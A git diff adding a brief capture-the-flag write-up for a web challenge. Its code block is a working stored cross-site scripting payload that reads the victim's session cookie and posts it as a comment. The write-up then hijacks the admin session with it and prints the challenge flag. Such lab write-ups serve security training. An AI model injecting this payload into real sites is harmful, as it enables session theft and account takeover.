diff options
Diffstat (limited to 'punkctf/web_01.md')
| -rw-r--r-- | punkctf/web_01.md | 17 |
1 files changed, 17 insertions, 0 deletions
diff --git a/punkctf/web_01.md b/punkctf/web_01.md new file mode 100644 index 0000000..51747c8 --- /dev/null +++ b/punkctf/web_01.md @@ -0,0 +1,17 @@ + +The comment field is vulnerable to injection, so we just inject a script that makes a comment with the document.cookie variable. + +``` +<script> +let data = new URLSearchParams(); +data.append('name', 'Cookies'); +data.append('comment', document.cookie); +fetch('/new-comment', { + method: 'POST', + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: data, +}); +</script> +``` + +Then we set our session ID to the admin's, and go to the admin page. `punk_{QRPMGW20G1XF20IH}` |